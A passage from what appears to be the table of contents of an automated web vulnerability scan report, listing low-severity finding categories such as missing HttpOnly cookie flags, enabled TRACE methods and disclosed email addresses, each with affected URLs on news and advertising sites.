13.92. http://www.myspace.com/Modules/PostTo/Pages/

13.93. http://www.sacbee.com/reg_js/access_check.js

13.94. http://www.wtp101.com/pull_sync

13.95. http://www.youtube.com/results

14. Cookie without HttpOnly flag set

14.1. http://content.usatoday.com/quickquestion/jquery/1.0.1.html

14.2. http://findnsave.sacbee.com/api/aacoupons.json

14.3. http://findnsave.sacbee.com/api/groupon.json

14.4. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

14.5. http://shop.sprint.com/mysprint/shop/phone_wall.jsp

14.6. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

14.7. http://trc.taboolasyndication.com/reuters/trc/2/json

14.8. http://www.cars.com/go/crp/index.jsp

14.9. https://www.linkedin.com/secure/login

14.10. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html

14.11. http://www.usatoday.com/community/profile.htm

14.12. http://www.usatoday.com/marketing/feedback.htm

14.13. http://www.usatoday.com/marketing/questions.htm

14.14. http://a.tribalfusion.com/j.ad

14.15. http://ad.360yield.com/match

14.16. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3

14.17. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5

14.18. http://ad.turn.com/r/cs

14.19. http://ad.turn.com/server/pixel.htm

14.20. http://ad.yabuka.com/statsin/adframe/803/300x250

14.21. http://ad.yieldmanager.com/pixel

14.22. http://ads.revsci.net/adserver/ako

14.23. http://ads.revsci.net/adserver/ako

14.24. http://ads.revsci.net/adserver/ako

14.25. http://ads.revsci.net/adserver/ako

14.26. http://ads.undertone.com/ajs.php

14.27. http://ads.undertone.com/fc.php

14.28. http://ads.undertone.com/l

14.29. http://ak1.abmr.net/is/ads.undertone.com

14.30. http://ak1.abmr.net/is/tag.admeld.com

14.31. http://api.bizographics.com/v1/profile.redirect

14.32. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

14.33. http://ar.atwola.com/atd

14.34. http://as.casalemedia.com/s

14.35. http://b.scorecardresearch.com/b

14.36. http://b.scorecardresearch.com/p

14.37. http://b.scorecardresearch.com/r

14.38. http://bh.contextweb.com/bh/rtset

14.39. http://bookmarks.yahoo.com/myresults/bookmarklet

14.40. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

14.41. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

14.42. http://c7.zedo.com/utils/ecSet.js

14.43. http://c7.zedo.com/utils/ecSet.js

14.44. http://clk.fetchback.com/serve/fb/click

14.45. http://cm.npc-mcclatchy.overture.com/js_1_0/

14.46. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

14.47. http://companion.adap.tv/companion/post

14.48. http://control.adap.tv/control

14.49. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

14.50. http://developers.facebook.com/plugins/

14.51. http://i.w55c.net/ping_match.gif

14.52. http://imp.fetchback.com/serve/fb/adtag.js

14.53. http://imp.fetchback.com/serve/fb/imp

14.54. http://js.revsci.net/gateway/gw.js

14.55. http://leadback.advertising.com/adcedge/lb

14.56. http://legolas.nexac.com/lgalt

14.57. http://load.exelator.com/load/

14.58. http://log.adap.tv/log

14.59. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516

14.60. http://odb.outbrain.com/utils/get

14.61. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

14.62. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

14.63. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js

14.64. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

14.65. http://p.brilig.com/contact/bct

14.66. http://pix04.revsci.net/A11149/a4/0/0/123.302

14.67. http://pix04.revsci.net/D08734/a1/0/0/0.gif

14.68. http://pix04.revsci.net/D08734/a1/0/3/0.js

14.69. http://pix04.revsci.net/F09828/a4/0/0/0.js

14.70. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js

14.71. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

14.72. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js

14.73. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

14.74. http://pixel.rubiconproject.com/tap.php

14.75. http://pixel.rubiconproject.com/tap.php

14.76. http://pixel.rubiconproject.com/tap.php

14.77. http://pixel.rubiconproject.com/tap.php

14.78. http://r.openx.net/set

14.79. http://r.turn.com/server/pixel.htm

14.80. http://rt.legolas-media.com/lgrt

14.81. http://segments.adap.tv/data

14.82. http://segments.adap.tv/data/

14.83. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif

14.84. http://sitelife.usatoday.com/ver1.0/Content/images/store/9/0/59f90df9-de0f-4ab1-b029-5ae171768d76.P4Avatar.jpg

14.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

14.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png

14.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

14.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

14.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

14.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

14.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

14.92. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

14.93. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png

14.94. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png

14.95. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

14.96. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

14.97. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

14.98. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif

14.99. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif

14.100. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

14.101. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

14.102. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

14.103. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

14.104. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

14.105. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

14.106. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

14.107. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

14.108. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

14.109. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

14.110. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

14.111. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

14.112. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

14.113. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

14.114. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

14.115. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

14.116. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js

14.117. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js

14.118. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

14.119. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

14.120. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js

14.121. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js

14.122. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

14.123. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css

14.124. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

14.125. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

14.126. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

14.127. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

14.128. http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

14.129. http://sync.adap.tv/sync

14.130. http://sync.mathtag.com/sync/img

14.131. http://tacoda.at.atwola.com/rtx/r.js

14.132. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

14.133. http://tags.bluekai.com/site/2964

14.134. http://tags.bluekai.com/site/38

14.135. http://tags.bluekai.com/site/4449

14.136. http://tags.bluekai.com/site/450

14.137. http://tags.bluekai.com/site/4592

14.138. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

14.139. http://tu.connect.wunderloop.net/TU/1/1/1/

14.140. http://tu.connect.wunderloop.net/TU2/1/1/1/

14.141. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

14.142. http://www.bizographics.com/collect/

14.143. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx

14.144. http://www.cars.com/go/advice/index.jsp

14.145. http://www.cars.com/go/advice/shopping/cpo/index.jsp

14.146. http://www.cars.com/go/kbb/kbbInput.jsp

14.147. http://www.cars.com/go/photogalleries/index.jsp

14.148. http://www.cars.com/go/search/advanced_search.jsp

14.149. http://www.cars.com/images/bttncapOrngR.gif

14.150. http://www.cars.com/images/long_back_orng.gif

14.151. http://www.cars.com/includes/js/makemodels-used.js

14.152. http://www.cars.com/includes/js/used-car-widget_driver.js

14.153. http://www.cars.com/test/widget/Custom/carslogo71x34.jpg

14.154. http://www.myspace.com/Modules/PostTo/Pages/

14.155. http://www.nbcudigitaladops.com/favicon.ico

14.156. http://www.newslibrary.com/nlsearch.asp

14.157. http://www.sacbee.com/reg_js/access_check.js

14.158. http://www.wtp101.com/pull_sync

14.159. http://www.youtube.com/results

15. Password field with autocomplete enabled

15.1. http://digg.com/submit

15.2. https://login.yahoo.com/config/login

15.3. http://slashdot.org/bookmark.pl

15.4. http://slashdot.org/bookmark.pl

15.5. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

15.6. http://www.ispsports.com/radio-network-affiliates.cfm

15.7. https://www.linkedin.com/secure/login

15.8. http://www.outbrain.com/privacy

15.9. http://www.sacbee.com/reg-bin/int.cgi

15.10. http://www.sacbee.com/reg-bin/int.cgi

15.11. https://www.sprint.net/

15.12. https://www.sprint.net/

15.13. https://www.sprint.net/index.php

15.14. https://www.sprint.net/index.php

15.15. http://www.thatsracin.com/reg-bin/int.cgi

15.16. http://www.thatsracin.com/reg-bin/int.cgi

15.17. http://www.thatsracin.com/reg-bin/int.cgi

16. Source code disclosure

17. ASP.NET debugging enabled

17.1. http://my.textcaster.com/Default.aspx

17.2. http://stockscreener.us.reuters.com/Default.aspx

17.3. http://usata1.gcion.com/Default.aspx

17.4. http://www.wisdomtree.com/Default.aspx

18. Referer-dependent response

18.1. http://c.brightcove.com/services/viewer/federated_f9

18.2. http://www.facebook.com/plugins/like.php

18.3. http://www.facebook.com/plugins/likebox.php

18.4. http://www.facebook.com/plugins/recommendations.php

19. Cross-domain POST

19.1. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

19.2. http://www.cars.com/go/advice/index.jsp

19.3. http://www.cars.com/go/crp/index.jsp

19.4. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

20. Cross-domain Referer leakage

20.1. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

20.2. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

20.3. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

20.4. http://ad.doubleclick.net/adj/mi.clt00/Sports

20.5. http://ad.doubleclick.net/adj/mi.clt00/Sports

20.6. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle

20.7. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle

20.8. http://admeld.adnxs.com/usersync

20.9. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx

20.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

20.11. http://anrtx.tacoda.net/rtx/r.js

20.12. http://cm.g.doubleclick.net/pixel

20.13. http://cm.g.doubleclick.net/pixel

20.14. http://cm.npc-mcclatchy.overture.com/js_1_0/

20.15. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

20.16. http://googleads.g.doubleclick.net/pagead/ads

20.17. http://imp.fetchback.com/serve/fb/imp

20.18. http://pixel.invitemedia.com/admeld_sync

20.19. http://rtq.careerbuilder.com/RTQ/jobstream.aspx

20.20. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

20.21. http://www.facebook.com/plugins/likebox.php

20.22. http://www.facebook.com/plugins/recommendations.php

20.23. http://www.google.com/search

20.24. http://www.google.com/trends/hottrends

20.25. http://www.google.com/trends/hottrends

20.26. http://www.google.com/trends/hottrends

20.27. http://www.google.com/trends/hottrends

20.28. http://www.google.com/trends/hottrends

20.29. http://www.google.com/trends/hottrends

20.30. http://www.reuters.com/assets/commentsChild

21. Cross-domain script include

21.1. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

21.2. http://cdn.optmd.com/V2/89733/235451/index.html

21.3. http://charlotteobserver.adperfect.com/

21.4. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

21.5. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp

21.6. http://digg.com/submit

21.7. http://grfx.cstv.com/scripts/oas-omni-controls.js

21.8. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012

21.9. https://login.yahoo.com/config/login

21.10. http://notredame-hospitality.cbscollegestore.com/store.cfm

21.11. https://observ.subscribeobserver.com/

21.12. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

21.13. http://s3.cinesport.com/app_v2/csprt_player.js

21.14. http://s3.cinesport.com/players/charlotteobservergeneric.html

21.15. http://sacramentoconnect.sacbee.com/

21.16. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

21.17. http://slashdot.org/bookmark.pl

21.18. http://stockscreener.us.reuters.com/Stock/US/Index

21.19. http://und.cbscollegestore.com/store.cfm

21.20. http://und.cbscollegestore.com/store_contents.cfm

21.21. http://www.bayareasearchengineacademy.org/blog/

21.22. http://www.careerbuilder.com/

21.23. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx

21.24. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

21.25. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx

21.26. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx

21.27. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx

21.28. http://www.cars.com/go/advice/index.jsp

21.29. http://www.cars.com/go/advice/shopping/cpo/index.jsp

21.30. http://www.cars.com/go/crp/index.jsp

21.31. http://www.cars.com/go/kbb/kbbInput.jsp

21.32. http://www.cars.com/go/photogalleries/index.jsp

21.33. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

21.34. http://www.charlotteobserver.com/advertising/index.html

21.35. http://www.charlotteobserver.com/newsroom/index.html

21.36. http://www.facebook.com/plugins/likebox.php

21.37. http://www.facebook.com/plugins/likebox.php

21.38. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

21.39. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

21.40. http://www.goutsa.com/ViewArticle.dbml

21.41. http://www.greenbiz.com/

21.42. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

21.43. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903

21.44. http://www.reuters.com/assets/commentsChild

21.45. http://www.reuters.com/assets/newsFlash

21.46. http://www.reuters.com/assets/print

21.47. http://www.reuters.com/do/emailArticle

21.48. http://www.reuters.com/finance/markets/index

21.49. http://www.reuters.com/news/archive/topNews

21.50. http://www.reuters.com/news/pictures/slideshow

21.51. http://www.reuters.com/news/video

21.52. http://www.reuters.com/video/2011/06/08/dramatic-video-captures-toronto-lightnin

21.53. http://www.reuters.com/video/2011/08/08/england-football-friendly-cancelled-afte

21.54. http://www.reuters.com/video/2011/08/15/football-gains-level-playing-field

21.55. http://www.reuters.com/video/2011/08/18/lockheed-martin-presents-airship-of-the

21.56. http://www.reuters.com/video/2011/08/22/buenos-aires-fashion-week-sizzles

21.57. http://www.reuters.com/video/2011/08/26/experimental-plane-reaches-13000-mph

21.58. http://www.reuters.com/video/2011/09/02/job-angst-disrupts-stock-market

21.59. http://www.reuters.com/video/2011/09/02/job-seeker-finds-job-in-tough-times

21.60. http://www.reuters.com/video/2011/09/03/cias-close-links-with-gaddafi-revealed

21.61. http://www.reuters.com/video/2011/09/03/dsk-departs

21.62. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

21.63. http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

21.64. http://www.sacbee.com/mr/b.gif

21.65. http://www.sacbee.com/mr/e.gif

21.66. http://www.sacbee.com/mr/f.gif

21.67. http://www.sacbee.com/reg-bin/int.cgi

21.68. http://www.sacbee.com/reg-bin/tint.cgi

21.69. https://www.sprint.net/

21.70. https://www.sprint.net/index.php

21.71. http://www.stumbleupon.com/submit

21.72. http://www.thatsracin.com/reg-bin/int.cgi

21.73. http://www.tsn.ca/ncaa/story/

21.74. http://www.und.com/allaccess/

21.75. http://www.und.com/sports/m-footbl/9873956

21.76. http://www.und.com/sports/m-footbl/9874134

21.77. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html

21.78. http://www.usatoday.com/community/profile.htm

21.79. http://www.usatoday.com/marketing/feedback.htm

21.80. http://www.usatoday.com/marketing/questions.htm

21.81. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

21.82. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

21.83. http://www.youtube.com/results

22. File upload functionality

23. TRACE method is enabled

23.1. http://anrtx.tacoda.net/

23.2. http://bh.contextweb.com/

23.3. http://blogs.reuters.com/

23.4. http://clk.fetchback.com/

23.5. http://digg.com/

23.6. http://dw.com.com/

23.7. http://image2.pubmatic.com/

23.8. http://imp.fetchback.com/

23.9. http://legolas.nexac.com/

23.10. http://log.c12s.com/

23.11. http://matcher-rbc.bidder7.mookie1.com/

23.12. https://observ.subscribeobserver.com/

23.13. http://optimized-by.rubiconproject.com/

23.14. http://outbrain.com/

23.15. http://picasaweb.google.com/

23.16. http://pixel.rubiconproject.com/

23.17. http://r.openx.net/

23.18. http://rt.legolas-media.com/

23.19. http://sacramentoconnect.sacbee.com/

23.20. http://search.spotxchange.com/

23.21. http://shop.sprint.com/

23.22. http://tacoda.at.atwola.com/

23.23. http://tap.rubiconproject.com/

23.24. http://www.greenbiz.com/

23.25. http://www.idg.com/

23.26. http://www.newslibrary.com/

23.27. http://www.outbrain.com/

23.28. http://www.sprint.com/

23.29. https://www.sprint.net/

23.30. http://www.stumbleupon.com/

24. Email addresses disclosed

24.1. http://cdn.echoenabled.com/clientapps/v2/stream.js

24.2. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json

24.3. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

24.4. http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js

24.5. https://login.yahoo.com/config/login

24.6. http://media.charlotteobserver.com/static/scripts/mi/utility_lib.js

24.7. http://odb.outbrain.com/utils/get

24.8. https://subscriberservices.mcclatchy.com/char/transactiontype.asp

24.9. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

24.10. http://www.charlotteobserver.com/advertising/index.html

24.11. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

24.12. http://www.google.com/trends/hottrends

24.13. http://www.idg.com/www/rd.nsf/rd

24.14. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

24.15. http://www.newslibrary.com/nlsearch.asp

24.16. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

24.17. http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

24.18. http://www.sacbee.com/mr/b.gif

24.19. http://www.sacbee.com/mr/e.gif

24.20. http://www.sacbee.com/mr/f.gif

24.21. http://www.sacbee.com/reg-bin/int.cgi

24.22. http://www.sacbee.com/reg-bin/tint.cgi

24.23. http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js

24.24. http://www.sprint.com/legal/agreement.html

24.25. http://www.sprint.com/legal/copyright.html

24.26. http://www.usatoday.com/marketing/feedback.htm

24.27. http://www.usatoday.com/marketing/questions.htm

25. Private IP addresses disclosed

25.1. http://developers.facebook.com/plugins/

25.2. http://digg.com/submit

25.3. http://external.ak.fbcdn.net/safe_image.php

25.4. http://external.ak.fbcdn.net/safe_image.php

25.5. http://external.ak.fbcdn.net/safe_image.php

25.6. http://external.ak.fbcdn.net/safe_image.php

25.7. http://external.ak.fbcdn.net/safe_image.php

25.8. http://external.ak.fbcdn.net/safe_image.php

25.9. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.10. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.11. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/6buK9-Tz27V.js

25.12. http://www.facebook.com/campaign/landing.php

25.13. http://www.facebook.com/extern/login_status.php

25.14. http://www.facebook.com/extern/login_status.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.facebook.com/extern/login_status.php

25.17. http://www.facebook.com/extern/login_status.php

25.18. http://www.facebook.com/home.php

25.19. http://www.facebook.com/plugins/like.php

25.20. http://www.facebook.com/plugins/like.php

25.21. http://www.facebook.com/plugins/like.php

25.22. http://www.facebook.com/plugins/like.php

25.23. http://www.facebook.com/plugins/like.php

25.24. http://www.facebook.com/plugins/like.php

25.25. http://www.facebook.com/plugins/likebox.php

25.26. http://www.facebook.com/plugins/likebox.php

25.27. http://www.facebook.com/plugins/recommendations.php

25.28. http://www.facebook.com/plugins/recommendations.php

25.29. http://www.facebook.com/share.php

25.30. http://www.facebook.com/sharer.php

25.31. http://www.goutsa.com/ViewArticle.dbml

26. Robots.txt file

26.1. http://206537.r.msn.com/

26.2. http://243973.r.msn.com/

26.3. http://943042.r.msn.com/

26.4. http://a.tribalfusion.com/j.ad

26.5. http://ad.afy11.net/ad

26.6. http://ad.doubleclick.net/adj/N763.usatoday.comOX3622/B5770010.6

26.7. http://ad.turn.com/server/pixel.htm

26.8. http://ad.yieldmanager.com/pixel

26.9. http://ads.undertone.com/ajs.php

26.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

26.11. http://api.affinesystems.com/event/impression

26.12. http://api.bizographics.com/v1/profile.redirect

26.13. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

26.14. http://ar.atwola.com/atd

26.15. http://as.casalemedia.com/s

26.16. http://b.scorecardresearch.com/b

26.17. http://blogs.reuters.com/wp-content/widgets/rtrxtra/rac.php

26.18. http://bookmarks.yahoo.com/myresults/bookmarklet

26.19. http://c.brightcove.com/services/viewer/federated_f9

26.20. http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

26.21. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

26.22. http://cdn.gigya.com/js/socialize.js

26.23. http://cdn.optmd.com/V2/89733/235451/index.html

26.24. http://cdn.turn.com/server/ddc.htm

26.25. https://cdns.gigya.com/gs/SafariIDsProxy.htm

26.26. http://charlotteobserver.adperfect.com/

26.27. http://clk.fetchback.com/serve/fb/click

26.28. http://cm.g.doubleclick.net/pixel

26.29. http://cm.npc-mcclatchy.overture.com/js_1_0/

26.30. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

26.31. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp

26.32. http://digg.com/submit

26.33. https://docs.google.com/

26.34. http://dw.com.com/clear/c.gif

26.35. http://espn.go.com/dallas/ncf/preview

26.36. http://feedburner.google.com/fb/a/mailverify

26.37. http://findnsave.sacbee.com/api/groupon.json

26.38. http://friendfeed.com/share

26.39. http://funds.reuters.com/lipper/retail/reuters/overview.asp

26.40. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

26.41. https://google.com/accounts/Logout

26.42. http://googleads.g.doubleclick.net/aclk

26.43. http://groups.google.com/groups

26.44. http://images.google.com/support/bin/answer.py

26.45. http://imp.fetchback.com/serve/fb/adtag.js

26.46. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012

26.47. http://jlinks.industrybrains.com/jsct

26.48. http://l.addthiscdn.com/live/t00/250lo.gif

26.49. http://legolas.nexac.com/lgalt

26.50. http://links.industrybrains.com/click

26.51. http://load.exelator.com/crossdomain.xml

26.52. https://mail.google.com/mail/

26.53. https://maps-api-ssl.google.com/maps

26.54. http://maps.google.com/maps

26.55. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778

26.56. http://news.google.com/news/story

26.57. http://nextelonline.nextel.com/tl/set_tl.html

26.58. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516

26.59. http://notredame-hospitality.cbscollegestore.com/store.cfm

26.60. http://ocp.ncaa.com/adFunctions.js

26.61. http://odb.outbrain.com/utils/get

26.62. http://pagead2.googlesyndication.com/pagead/imgad

26.63. http://paid.outbrain.com/network/redir

26.64. http://pbid.pro-market.net/crossdomain.xml

26.65. http://picasaweb.google.com/lh/view

26.66. http://pixel.invitemedia.com/admeld_sync

26.67. http://pixel.quantserve.com/seg/r

26.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

26.69. http://pubads.g.doubleclick.net/gampad/ads

26.70. http://r.turn.com/server/pixel.htm

26.71. http://rd.rlcdn.com/rd

26.72. http://rt.legolas-media.com/lgrt

26.73. http://rtq.careerbuilder.com/RTQ/jobstream.aspx

26.74. http://s0.2mdn.net/1181183/espn_cfb_728x90_sn_main.swf

26.75. http://sacramentoconnect.sacbee.com/

26.76. http://safebrowsing.clients.google.com/safebrowsing/gethash

26.77. http://scholar.google.com/scholar

26.78. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

26.79. http://search.charlotteobserver.com/search-bin/search.pl.cgi

26.80. http://search.spotxchange.com/partner

26.81. http://search2.sacbee.com/search-bin/search.pl.cgi

26.82. http://shlinks.industrybrains.com/sh

26.83. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html

26.84. http://shopping.sacbee.com/ROP/Subcat.aspx

26.85. http://simg.zedo.com/speed-test/10k.gif

26.86. https://sites.google.com/

26.87. http://slashdot.org/bookmark.pl

26.88. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

26.89. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.90. http://store.cstv.com/marketplace/store.cfm

26.91. http://sync.mathtag.com/sync/img

26.92. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

26.93. http://tcr.tynt.com/javascripts/Tracer.js

26.94. http://traffic.outbrain.com/network/redir

26.95. http://translate.google.com/

26.96. http://trc.taboolasyndication.com/reuters/log/2/debug

26.97. http://tu.connect.wunderloop.net/TU/1/1/1/

26.98. http://twitter.com/home

26.99. http://und.cbscollegestore.com/store.cfm

26.100. http://und.cstvauctions.com/auctiondisplay.cfm

26.101. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

26.102. http://webcache.googleusercontent.com/search

26.103. http://www.bayareasearchengineacademy.org/blog/

26.104. http://www.bizographics.com/collect/

26.105. http://www.careerbuilder.com/share/login.aspx

26.106. http://www.cars.com/go/crp/index.jsp

26.107. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

26.108. http://www.facebook.com/plugins/like.php

26.109. http://www.fmglobal.com/default.aspx

26.110. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

26.111. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

26.112. http://www.google-analytics.com/__utm.gif

26.113. http://www.google.com/trends

26.114. http://www.googleadservices.com/pagead/conversion/1031221371/

26.115. http://www.greenbiz.com/

26.116. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

